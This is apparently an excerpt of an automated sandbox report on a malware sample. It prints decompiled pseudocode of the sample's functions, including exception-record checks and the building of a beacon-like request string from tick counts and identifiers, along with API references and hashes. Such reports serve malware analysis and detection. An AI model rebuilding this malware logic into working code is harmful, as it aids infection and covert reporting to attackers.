            • String ID:
            • API String ID: 2221118986-0
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 9ba6e1657ddddb07b849957b1dd51de6610c52014d81fddfd3673cf30d77ad97
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: 7022857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02028551(long _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				short* _v32;
            				void _v36;
            				void* _t57;
            				signed int _t58;
            				signed int _t61;
            				signed int _t62;
            				void* _t63;
            				signed int* _t68;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				void* _t76;
            				signed int _t77;
            				void* _t78;
            				void _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t86;
            				short* _t87;
            				void* _t89;
            				signed int* _t90;
            				long _t91;
            				signed int _t93;
            				signed int _t94;
            				signed int _t100;
            				signed int _t102;
            				void* _t104;
            				long _t108;
            				signed int _t110;
            
            				_t108 = _a4;
            				_t76 =  *(_t108 + 8);
            				if((_t76 & 0x00000003) != 0) {
            					L3:
            					return 0;
            				}
            				_a4 =  *[fs:0x4];
            				_v8 =  *[fs:0x8];
            				if(_t76 < _v8 || _t76 >= _a4) {
            					_t102 =  *(_t108 + 0xc);
            					__eflags = _t102 - 0xffffffff;
            					if(_t102 != 0xffffffff) {
            						_t91 = 0;
            						__eflags = 0;
            						_a4 = 0;
            						_t57 = _t76;
            						do {
            							_t80 =  *_t57;
            							__eflags = _t80 - 0xffffffff;
            							if(_t80 == 0xffffffff) {
            								goto L9;
            							}
            							__eflags = _t80 - _t91;
            							if(_t80 >= _t91) {
            								L20:
            								_t63 = 0;
            								L60:
            								return _t63;
            							}
            							L9:
            							__eflags =  *(_t57 + 4);
            							if( *(_t57 + 4) != 0) {
            								_t12 =  &_a4;
            								 *_t12 = _a4 + 1;
            								__eflags =  *_t12;
            							}
            							_t91 = _t91 + 1;
            							_t57 = _t57 + 0xc;
            							__eflags = _t91 - _t102;
            						} while (_t91 <= _t102);
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L15:
            							_t81 =  *0x202a380; // 0x0
            							_t110 = _t76 & 0xfffff000;
            							_t58 = 0;
            							__eflags = _t81;
            							if(_t81 <= 0) {
            								L18:
            								_t104 = _t102 | 0xffffffff;
            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
            								__eflags = _t61;
            								if(_t61 < 0) {
            									_t62 = 0;
            									__eflags = 0;
            								} else {
            									_t62 = _a4;
            								}
            								__eflags = _t62;
            								if(_t62 == 0) {
            									L59:
            									_t63 = _t104;
            									goto L60;
            								} else {
            									__eflags = _v12 - 0x1000000;
            									if(_v12 != 0x1000000) {
            										goto L59;
            									}
            									__eflags = _v16 & 0x000000cc;
            									if((_v16 & 0x000000cc) == 0) {
            										L46:
            										_t63 = 1;
            										 *0x202a3c8 = 1;
            										__eflags =  *0x202a3c8;
            										if( *0x202a3c8 != 0) {
            											goto L60;
            										}
            										_t84 =  *0x202a380; // 0x0
            										__eflags = _t84;
            										_t93 = _t84;
            										if(_t84 <= 0) {
            											L51:
            											__eflags = _t93;
            											if(_t93 != 0) {
            												L58:
            												 *0x202a3c8 = 0;
            												goto L5;
            											}
            											_t77 = 0xf;
            											__eflags = _t84 - _t77;
            											if(_t84 <= _t77) {
            												_t77 = _t84;
            											}
            											_t94 = 0;
            											__eflags = _t77;
            											if(_t77 < 0) {
            												L56:
            												__eflags = _t84 - 0x10;
            												if(_t84 < 0x10) {
            													_t86 = _t84 + 1;
            													__eflags = _t86;
            													 *0x202a380 = _t86;
            												}
            												goto L58;
            											} else {
            												do {
            													_t68 = 0x202a388 + _t94 * 4;
            													_t94 = _t94 + 1;
            													__eflags = _t94 - _t77;
            													 *_t68 = _t110;
            													_t110 =  *_t68;
            												} while (_t94 <= _t77);
            												goto L56;
            											}
            										}
            										_t69 = 0x202a384 + _t84 * 4;
            										while(1) {
            											__eflags =  *_t69 - _t110;
            											if( *_t69 == _t110) {
            												goto L51;
            											}
            											_t93 = _t93 - 1;
            											_t69 = _t69 - 4;
            											__eflags = _t93;
            											if(_t93 > 0) {
            												continue;
            											}
            											goto L51;
            										}
            										goto L51;
            									}
            									_t87 = _v32;
            									__eflags =  *_t87 - 0x5a4d;
            									if( *_t87 != 0x5a4d) {
            										goto L59;
            									}
            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
            									__eflags =  *_t71 - 0x4550;
            									if( *_t71 != 0x4550) {
            										goto L59;
            									}
            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
            										goto L59;
            									}
            									_t78 = _t76 - _t87;
            									__eflags =  *((short*)(_t71 + 6));
            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
            									if( *((short*)(_t71 + 6)) <= 0) {
            										goto L59;
            									}
            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
            									__eflags = _t78 - _t72;
            									if(_t78 < _t72) {
            										goto L46;
            									}
            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
            										goto L46;
            									}
            									__eflags =  *(_t89 + 0x27) & 0x00000080;
            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
            										goto L20;
            									}
            									goto L46;
            								}
            							} else {
            								goto L16;
            							}
            							while(1) {
            								L16:
            								__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 + 1;
            								__eflags = _t58 - _t81;
            								if(_t58 < _t81) {
            									continue;
            								}
            								goto L18;
            							}
            							__eflags = _t58;
            							if(_t58 <= 0) {
            								goto L5;
            							}
            							 *0x202a3c8 = 1;
            							__eflags =  *0x202a3c8;
            							if( *0x202a3c8 != 0) {
            								goto L5;
            							}
            							__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            							if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            								L32:
            								_t100 = 0;
            								__eflags = _t58;
            								if(_t58 < 0) {
            									L34:
            									 *0x202a3c8 = 0;
            									goto L5;
            								} else {
            									goto L33;
            								}
            								do {
            									L33:
            									_t90 = 0x202a388 + _t100 * 4;
            									_t100 = _t100 + 1;
            									__eflags = _t100 - _t58;
            									 *_t90 = _t110;
            									_t110 =  *_t90;
            								} while (_t100 <= _t58);
            								goto L34;
            							}
            							_t25 = _t81 - 1; // -1
            							_t58 = _t25;
            							__eflags = _t58;
            							if(_t58 < 0) {
            								L28:
            								__eflags = _t81 - 0x10;
            								if(_t81 < 0x10) {
            									_t81 = _t81 + 1;
            									__eflags = _t81;
            									 *0x202a380 = _t81;
            								}
            								_t28 = _t81 - 1; // 0x0
            								_t58 = _t28;
            								goto L32;
            							} else {
            								goto L25;
            							}
            							while(1) {
            								L25:
            								__eflags =  *((intOrPtr*)(0x202a388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x202a388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 - 1;
            								__eflags = _t58;
            								if(_t58 >= 0) {
            									continue;
            								}
            								break;
            							}
            							__eflags = _t58;
            							if(__eflags >= 0) {
            								if(__eflags == 0) {
            									goto L34;
            								}
            								goto L32;
            							}
            							goto L28;
            						}
            						_t75 =  *((intOrPtr*)(_t108 - 8));
            						__eflags = _t75 - _v8;
            						if(_t75 < _v8) {
            							goto L20;
            						}
            						__eflags = _t75 - _t108;
            						if(_t75 >= _t108) {
            							goto L20;
            						}
            						goto L15;
            					}
            					L5:
            					_t63 = 1;
            					goto L60;
            				} else {
            					goto L3;
            				}
            			}




































            0x0202855b
            0x0202855e
            0x02028564
            0x02028582
            0x00000000
            0x02028582
            0x0202856c
            0x02028575
            0x0202857b
            0x0202858a
            0x0202858d
            0x02028590
            0x0202859a
            0x0202859a
            0x0202859c
            0x0202859f
            0x020285a1
            0x020285a1
            0x020285a3
            0x020285a6
            0x00000000
            0x00000000
            0x020285a8
            0x020285aa
            0x02028610
            0x02028610
            0x0202876e
            0x00000000
            0x0202876e
            0x020285ac
            0x020285ac
            0x020285b0
            0x020285b2
            0x020285b2
            0x020285b2
            0x020285b2
            0x020285b5
            0x020285b6
            0x020285b9
            0x020285b9
            0x020285bd
            0x020285c1
            0x020285cf
            0x020285cf
            0x020285d7
            0x020285dd
            0x020285df
            0x020285e1
            0x020285f1
            0x020285fe
            0x02028602
            0x02028607
            0x02028609
            0x02028687
            0x02028687
            0x0202860b
            0x0202860b
            0x0202860b
            0x02028689
            0x0202868b
            0x0202876c
            0x0202876c
            0x00000000
            0x02028691
            0x02028691
            0x02028698
            0x00000000
            0x00000000
            0x0202869e
            0x020286a2
            0x020286fe
            0x02028700
            0x02028708
            0x0202870a
            0x0202870c
            0x00000000
            0x00000000
            0x0202870e
            0x02028714
            0x02028716
            0x02028718
            0x0202872d
            0x0202872d
            0x0202872f
            0x0202875e
            0x02028765
            0x00000000
            0x02028765
            0x02028733
            0x02028734
            0x02028736
            0x02028738
            0x02028738
            0x0202873a
            0x0202873c
            0x0202873e
            0x02028752
            0x02028752
            0x02028755
            0x02028757
            0x02028757
            0x02028758
            0x02028758
            0x00000000
            0x02028740
            0x02028740
            0x02028740
            0x02028749
            0x0202874a
            0x0202874c
            0x0202874e
            0x0202874e
            0x00000000
            0x02028740
            0x0202873e
            0x0202871a
            0x02028721
            0x02028721
            0x02028723
            0x00000000
            0x00000000
            0x02028725
            0x02028726
            0x02028729
            0x0202872b
            0x00000000
            0x00000000
            0x00000000
            0x0202872b
            0x00000000
            0x02028721
            0x020286a4
            0x020286a7
            0x020286ac
            0x00000000
            0x00000000
            0x020286b5
            0x020286b7
            0x020286bd
            0x00000000
            0x00000000
            0x020286c3
            0x020286c9
            0x00000000
            0x00000000
            0x020286cf
            0x020286d1
            0x020286da
            0x020286de
            0x00000000
            0x00000000
            0x020286e4
            0x020286e7
            0x020286e9
            0x00000000
            0x00000000
            0x020286f0
            0x020286f2
            0x00000000
            0x00000000
            0x020286f4
            0x020286f8
            0x00000000
            0x00000000
            0x00000000
            0x020286f8
            0x00000000
            0x00000000
            0x00000000
            0x020285e3
            0x020285e3
            0x020285e3
            0x020285ea
            0x00000000
            0x00000000
            0x020285ec
            0x020285ed
            0x020285ef
            0x00000000
            0x00000000
            0x00000000
            0x020285ef
            0x02028617
            0x02028619
            0x00000000
            0x00000000
            0x02028629
            0x0202862b
            0x0202862d
            0x00000000
            0x00000000
            0x02028633
            0x0202863a
            0x02028666
            0x02028666
            0x02028668
            0x0202866a
            0x0202867e
            0x02028680
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0202866c
            0x0202866c
            0x0202866c
            0x02028675
            0x02028676
            0x02028678
            0x0202867a
            0x0202867a
            0x00000000
            0x0202866c
            0x0202863c
            0x0202863c
            0x0202863f
            0x02028641
            0x02028653
            0x02028653
            0x02028656
            0x02028658
            0x02028658
            0x02028659
            0x02028659
            0x0202865f
            0x0202865f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x02028643
            0x02028643
            0x02028643
            0x0202864a
            0x00000000
            0x00000000
            0x0202864c
            0x0202864c
            0x0202864d
            0x00000000
            0x00000000
            0x00000000
            0x0202864d
            0x0202864f
            0x02028651
            0x02028664
            0x00000000
            0x00000000
            0x00000000
            0x02028664
            0x00000000
            0x02028651
            0x020285c3
            0x020285c6
            0x020285c9
            0x00000000
            0x00000000
            0x020285cb
            0x020285cd
            0x00000000
            0x00000000
            0x00000000
            0x020285cd
            0x02028592
            0x02028594
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02028602
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: 0de9b6040b8aab888688e79c9e35e213612bef7b679e46392b3e2f981cc6bd01
            • Instruction ID: c9bbdaa41a11caf96df3fe7b31c6fcb0987129d1d5a8dd11a779e2a6eccc59f2
            • Opcode Fuzzy Hash: 0de9b6040b8aab888688e79c9e35e213612bef7b679e46392b3e2f981cc6bd01
            • Instruction Fuzzy Hash: 2961D4387007318FDB6ACE28C59476973EAFB85358B24C52BE906C7285E735D84DE670
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E0202832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
            				intOrPtr _v8;
            				char _v12;
            				void* __ebp;
            				signed int* _t43;
            				char _t44;
            				void* _t46;
            				void* _t49;
            				intOrPtr* _t53;
            				void* _t54;
            				void* _t65;
            				long _t66;
            				signed int* _t80;
            				signed int* _t82;
            				void* _t84;
            				signed int _t86;
            				void* _t89;
            				void* _t95;
            				void* _t96;
            				void* _t99;
            				void* _t106;
            
            				_t43 = _t84;
            				_t65 = __ebx + 2;
            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
            				_t89 = _t95;
            				_t96 = _t95 - 8;
            				_push(_t65);
            				_push(_t84);
            				_push(_t89);
            				asm("cld");
            				_t66 = _a8;
            				_t44 = _a4;
            				if(( *(_t44 + 4) & 0x00000006) != 0) {
            					_push(_t89);
            					E02028497(_t66 + 0x10, _t66, 0xffffffff);
            					_t46 = 1;
            				} else {
            					_v12 = _t44;
            					_v8 = _a12;
            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
            					_t86 =  *(_t66 + 0xc);
            					_t80 =  *(_t66 + 8);
            					_t49 = E02028551(_t66);
            					_t99 = _t96 + 4;
            					if(_t49 == 0) {
            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            						goto L11;
            					} else {
            						while(_t86 != 0xffffffff) {
            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
            							if(_t53 == 0) {
            								L8:
            								_t80 =  *(_t66 + 8);
            								_t86 = _t80[_t86 + _t86 * 2];
            								continue;
            							} else {
            								_t54 =  *_t53();
            								_t89 = _t89;
            								_t86 = _t86;
            								_t66 = _a8;
            								_t55 = _t54;
            								_t106 = _t54;
            								if(_t106 == 0) {
            									goto L8;
            								} else {
            									if(_t106 < 0) {
            										_t46 = 0;
            									} else {
            										_t82 =  *(_t66 + 8);
            										E0202843C(_t55, _t66);
            										_t89 = _t66 + 0x10;
            										E02028497(_t89, _t66, 0);
            										_t99 = _t99 + 0xc;
            										E02028533(_t82[2]);
            										 *(_t66 + 0xc) =  *_t82;
            										_t66 = 0;
            										_t86 = 0;
            										 *(_t82[2])(1);
            										goto L8;
            									}
            								}
            							}
            							goto L13;
            						}
            						L11:
            						_t46 = 1;
            					}
            				}
            				L13:
            				return _t46;
            			}























            0x02028330
            0x02028331
            0x02028332
            0x02028335
            0x02028337
            0x0202833a
            0x0202833b
            0x0202833d
            0x0202833e
            0x0202833f
            0x02028342
            0x0202834c
            0x020283fd
            0x02028404
            0x0202840d
            0x02028352
            0x02028352
            0x02028358
            0x0202835e
            0x02028361
            0x02028364
            0x02028368
            0x0202836d
            0x02028372
            0x020283f2
            0x00000000
            0x02028374
            0x02028374
            0x02028380
            0x02028382
            0x020283dd
            0x020283dd
            0x020283e3
            0x00000000
            0x02028384
            0x02028393
            0x02028395
            0x02028396
            0x02028397
            0x0202839a
            0x0202839a
            0x0202839c
            0x00000000
            0x0202839e
            0x0202839e
            0x020283e8
            0x020283a0
            0x020283a0
            0x020283a4
            0x020283ac
            0x020283b1
            0x020283b6
            0x020283c2
            0x020283ca
            0x020283d1
            0x020283d7
            0x020283db
            0x00000000
            0x020283db
            0x0202839e
            0x0202839c
            0x00000000
            0x02028382
            0x020283f6
            0x020283f6
            0x020283f6
            0x02028372
            0x02028412
            0x02028419

            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: e0abae02fec0baf0e8ed48ceeb5785eef16bc0846f127b6c43bea2bc61f73cd0
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: 1621D6369003249FCB10EF68C8C09ABBBA5FF45350B49C1AAD9159B245E730F919CBF0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction ID: dc0d814f1a9316f36193728ce97dad20cf3399229c0dd3362e6abad7ca9e928d
            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction Fuzzy Hash: E801F77AA00601CFDF22CF24C914BAE33E9EB85605F0940A8F50697242EB70A8429F90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E02022B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
            				intOrPtr _v4;
            				signed int _v8;
            				int* _v12;
            				char* _v16;
            				intOrPtr _v20;
            				void* _v24;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				long _t68;
            				intOrPtr _t69;
            				intOrPtr _t70;
            				intOrPtr _t71;
            				intOrPtr _t72;
            				intOrPtr _t73;
            				void* _t76;
            				intOrPtr _t77;
            				int _t80;
            				intOrPtr _t81;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				intOrPtr _t87;
            				void* _t89;
            				void* _t92;
            				intOrPtr _t96;
            				intOrPtr _t100;
            				intOrPtr* _t102;
            				int* _t108;
            				int* _t118;
            				char** _t120;
            				char* _t121;
            				intOrPtr* _t126;
            				intOrPtr* _t128;
            				intOrPtr* _t130;
            				intOrPtr* _t132;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				int _t142;
            				intOrPtr _t144;
            				int _t147;
            				intOrPtr _t148;
            				int _t151;
            				void* _t152;
            				intOrPtr _t166;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				void* _t171;
            				long _t172;
            				intOrPtr* _t173;
            				intOrPtr* _t174;
            				intOrPtr _t175;
            				intOrPtr* _t178;
            				char** _t181;
            				char** _t183;
            				char** _t184;
            				void* _t189;
            
            				_t68 = __eax;
            				_t181 =  &_v16;
            				_t152 = _a20;
            				_a20 = 8;
            				if(__eax == 0) {
            					_t68 = GetTickCount();
            				}
            				_t69 =  *0x202a018; // 0x1228dd1
            				asm("bswap eax");
            				_t70 =  *0x202a014; // 0x3a87c8cd
            				asm("bswap eax");
            				_t71 =  *0x202a010; // 0xd8d2f808
            				asm("bswap eax");
            				_t72 =  *0x202a00c; // 0x13d015ef
            				asm("bswap eax");
            				_t73 =  *0x202a348; // 0xc7d5a8
            				_t3 = _t73 + 0x202b5ac; // 0x74666f73
            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x202a02c,  *0x202a004, _t68);
            				_t76 = E0202467F();
            				_t77 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t77 + 0x202b575; // 0x74707526
            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
            				_t183 =  &(_t181[0xe]);
            				_t170 = _t169 + _t80;
            				if(_a24 != 0) {
            					_t148 =  *0x202a348; // 0xc7d5a8
            					_t8 = _t148 + 0x202b508; // 0x732526
            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
            					_t183 =  &(_t183[3]);
            					_t170 = _t170 + _t151;
            				}
            				_t81 =  *0x202a348; // 0xc7d5a8
            				_t10 = _t81 + 0x202b89e; // 0x2ca8e46
            				_t153 = _t10;
            				_t189 = _a20 - _t10;
            				_t12 = _t81 + 0x202b246; // 0x74636126
            				_t164 = 0 | _t189 == 0x00000000;
            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
            				_t85 =  *0x202a36c; // 0x2ca95b0
            				_t184 =  &(_t183[3]);
            				if(_t85 != 0) {
            					_t144 =  *0x202a348; // 0xc7d5a8
            					_t16 = _t144 + 0x202b8be; // 0x3d736f26
            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t147;
            				}
            				_t86 = E0202472F(_t153);
            				_a32 = _t86;
            				if(_t86 != 0) {
            					_t139 =  *0x202a348; // 0xc7d5a8
            					_t19 = _t139 + 0x202b8d0; // 0x736e6426
            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t142;
            					HeapFree( *0x202a2d8, 0, _a40);
            				}
            				_t87 = E02021340();
            				_a32 = _t87;
            				if(_t87 != 0) {
            					_t135 =  *0x202a348; // 0xc7d5a8
            					_t23 = _t135 + 0x202b8c5; // 0x6f687726
            					wsprintfA(_t171 + _t152, _t23, _t87);
            					_t184 =  &(_t184[3]);
            					HeapFree( *0x202a2d8, 0, _a40);
            				}
            				_t166 =  *0x202a3cc; // 0x2ca9600
            				_t89 = E02026B59( &E0202A00A, _t166 + 4);
            				_t172 = 0;
            				_a16 = _t89;
            				if(_t89 == 0) {
            					L30:
            					HeapFree( *0x202a2d8, _t172, _t152);
            					return _a44;
            				} else {
            					_t92 = RtlAllocateHeap( *0x202a2d8, 0, 0x800);
            					_a24 = _t92;
            					if(_t92 == 0) {
            						L29:
            						HeapFree( *0x202a2d8, _t172, _a8);
            						goto L30;
            					}
            					E02022915(GetTickCount());
            					_t96 =  *0x202a3cc; // 0x2ca9600
            					__imp__(_t96 + 0x40);
            					asm("lock xadd [eax], ecx");
            					_t100 =  *0x202a3cc; // 0x2ca9600
            					__imp__(_t100 + 0x40);
            					_t102 =  *0x202a3cc; // 0x2ca9600
            					_t168 = E02026675(1, _t164, _t152,  *_t102);
            					asm("lock xadd [eax], ecx");
            					if(_t168 == 0) {
            						L28:
            						HeapFree( *0x202a2d8, _t172, _a16);
            						goto L29;
            					}
            					StrTrimA(_t168, 0x2029280);
            					_push(_t168);
            					_t108 = E02027563();
            					_v12 = _t108;
            					if(_t108 == 0) {
            						L27:
            						HeapFree( *0x202a2d8, _t172, _t168);
            						goto L28;
            					}
            					_t173 = __imp__;
            					 *_t173(_t168, _a8);
            					 *_t173(_a4, _v12);
            					_t174 = __imp__;
            					 *_t174(_v4, _v24);
            					_t175 = E02026536( *_t174(_v12, _t168), _v20);
            					_v36 = _t175;
            					if(_t175 == 0) {
            						_v8 = 8;
            						L25:
            						E020263F6();
            						L26:
            						HeapFree( *0x202a2d8, 0, _v40);
            						_t172 = 0;
            						goto L27;
            					}
            					_t118 = E02026F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
            					_v12 = _t118;
            					if(_t118 == 0) {
            						_t178 = _v24;
            						_v20 = E0202597D(_t178, _t175, _v16, _v12);
            						_t126 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
            						_t128 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t128 + 8))(_t128);
            						_t130 =  *((intOrPtr*)(_t178 + 4));
            						 *((intOrPtr*)( *_t130 + 8))(_t130);
            						_t132 =  *_t178;
            						 *((intOrPtr*)( *_t132 + 8))(_t132);
            						E020261DA(_t178);
            					}
            					if(_v8 != 0x10d2) {
            						L20:
            						if(_v8 == 0) {
            							_t120 = _v16;
            							if(_t120 != 0) {
            								_t121 =  *_t120;
            								_t176 =  *_v12;
            								_v16 = _t121;
            								wcstombs(_t121, _t121,  *_v12);
            								 *_v24 = E0202673A(_v16, _v16, _t176 >> 1);
            							}
            						}
            						goto L23;
            					} else {
            						if(_v16 != 0) {
            							L23:
            							E020261DA(_v32);
            							if(_v12 == 0 || _v8 == 0x10d2) {
            								goto L26;
            							} else {
            								goto L25;
            							}
            						}
            						_v8 = _v8 & 0x00000000;
            						goto L20;
            					}
            				}
            			}






























































            0x02022b91
            0x02022b91
            0x02022b95
            0x02022b9c
            0x02022ba6
            0x02022ba8
            0x02022ba8
            0x02022bb5
            0x02022bc0
            0x02022bc3
            0x02022bce
            0x02022bd1
            0x02022bd6
            0x02022bd9
            0x02022bde
            0x02022be1
            0x02022bed
            0x02022bfa
            0x02022bfc
            0x02022c02
            0x02022c07
            0x02022c12
            0x02022c14
            0x02022c17
            0x02022c1e
            0x02022c20
            0x02022c29
            0x02022c34
            0x02022c36
            0x02022c39
            0x02022c39
            0x02022c3b
            0x02022c40
            0x02022c40
            0x02022c48
            0x02022c4c
            0x02022c52
            0x02022c5d
            0x02022c5f
            0x02022c64
            0x02022c69
            0x02022c6c
            0x02022c71
            0x02022c7c
            0x02022c7e
            0x02022c81
            0x02022c81
            0x02022c83
            0x02022c8e
            0x02022c94
            0x02022c97
            0x02022c9c
            0x02022ca7
            0x02022ca9
            0x02022cb0
            0x02022cba
            0x02022cba
            0x02022cbc
            0x02022cc1
            0x02022cc7
            0x02022cca
            0x02022ccf
            0x02022cd9
            0x02022cdb
            0x02022cea
            0x02022cea
            0x02022cec
            0x02022cfa
            0x02022cff
            0x02022d01
            0x02022d07
            0x02022ee7
            0x02022eef
            0x02022efc
            0x02022d0d
            0x02022d19
            0x02022d1f
            0x02022d25
            0x02022eda
            0x02022ee5
            0x00000000
            0x02022ee5
            0x02022d31
            0x02022d36
            0x02022d3f
            0x02022d50
            0x02022d54
            0x02022d5d
            0x02022d63
            0x02022d70
            0x02022d7d
            0x02022d83
            0x02022ecd
            0x02022ed8
            0x00000000
            0x02022ed8
            0x02022d8f
            0x02022d95
            0x02022d96
            0x02022d9b
            0x02022da1
            0x02022ec3
            0x02022ecb
            0x00000000
            0x02022ecb
            0x02022dab
            0x02022db2
            0x02022dbc
            0x02022dc2
            0x02022dcc
            0x02022dde
            0x02022de0
            0x02022de6
            0x02022eff
            0x02022eae
            0x02022eae
            0x02022eb3
            0x02022ebf
            0x02022ec1
            0x00000000
            0x02022ec1
            0x02022df1
            0x02022df6
            0x02022dfc
            0x02022e07
            0x02022e12
            0x02022e16
            0x02022e1c
            0x02022e22
            0x02022e28
            0x02022e2b
            0x02022e31
            0x02022e34
            0x02022e39
            0x02022e3d
            0x02022e3d
            0x02022e4a
            0x02022e58
            0x02022e5d
            0x02022e5f
            0x02022e65
            0x02022e6b
            0x02022e6d
            0x02022e72
            0x02022e76
            0x02022e92
            0x02022e92
            0x02022e65
            0x00000000
            0x02022e4c
            0x02022e51
            0x02022e94
            0x02022e98
            0x02022ea2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x02022ea2
            0x02022e53
            0x00000000
            0x02022e53
            0x02022e4a

            APIs
            • GetTickCount.KERNEL32 ref: 02022BA8
            • wsprintfA.USER32 ref: 02022BF5
            • wsprintfA.USER32 ref: 02022C12
            • wsprintfA.USER32 ref: 02022C34
            • wsprintfA.USER32 ref: 02022C5B
            • wsprintfA.USER32 ref: 02022C7C
            • wsprintfA.USER32 ref: 02022CA7
            • HeapFree.KERNEL32(00000000,?), ref: 02022CBA
            • wsprintfA.USER32 ref: 02022CD9
            • HeapFree.KERNEL32(00000000,?), ref: 02022CEA
              • Part of subcall function 02026B59: RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02026B75
              • Part of subcall function 02026B59: RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02026B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02022D19
            • GetTickCount.KERNEL32 ref: 02022D2B
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02022D3F
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02022D5D
